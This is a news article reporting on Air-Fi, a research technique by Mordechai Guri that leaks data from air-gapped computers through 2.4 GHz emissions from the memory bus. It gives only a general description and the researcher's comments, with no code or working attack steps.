A new theoretical exploit called Air-Fi can turn a secure, air-gapped computer into a Wi-Fi transmitter that can help a hacker exfiltrate secure data.
An air-gapped computer is a computer that is completely disconnected from any network. Many air-gapped machines have every possible network feature removed, from Wi-Fi to Bluetooth, but this exploit shows that hackers can use DDR SDRAM buses “to generate electromagnetic emissions in the 2.4 GHz Wi-Fi bands and encode binary data on top of it,” according to the researcher Mordechai Guri of the Ben-Gurion University of the Negev, Israel.
“This technique required high levels of skills from the attacker, in both design and implementation,” said Guri in an email. “However, there are simpler covert exfiltration channels for conventional IT environments in the wild. This one is focusing on leaking data from air-gapped computers where the traditional network-based covert channels fail.”
“Using the Wi-Fi medium in such a non-conventional way is something that I’ve been examining during the last year,” he said.
The transmissions are invisible to other devices and only the hacker can only pick them up with specially-prepared software and hardware.
As a part of the exfiltration phase, the attacker might collect data from the compromised computers. The data can be documents, key logging, credentials, encryption keys, etc. Once the data is collected, the malware initiates the AIR-FI covert channel. It encodes the data and transmits it to the air (in the Wi-Fi band at 2.4 GHz) using the electromagnetic emissions generated from the DDR SDRAM buses.
Guri is well-known in security circles for figuring out how to attack air-gapped machines. In 2019 he used screen brightness and power lines to transmit data from secure computers and in 2018 he was also able to transmit data via ultrasonic audio files using a simple computer speaker.
In this exploit, Guri was able to force the DDR SDRAM busses to transmit to compromised Wi-Fi-capable devices like laptops and smartphones. He hacked four workstations with the exploit, each outfitted with similar 4GB DIMM DDR4 or DDR3 RAM sticks installed. The rest of the hardware was bog-standard and ran the Ubuntu operating system.
The exploit does require the hacker to have access to the computer’s operating system which means you’d have to infect the machine before you could start sending out data. Further, once the computer is transmitting via its memory bus the hacker must have a receiver no more than a few feet away from the machine to capture the Wi-Fi signals, thereby making this exploit more interesting than dangerous.
“Interestingly, in the past, we have successfully demonstrated exfiltration via covert FM radio signals generated from the monitor, then we introduced how attackers can produce cellular frequencies from the computer to leak data. It was natural that the next candidate will be Wi-Fi. This one was also the most challenging one,” said Guri.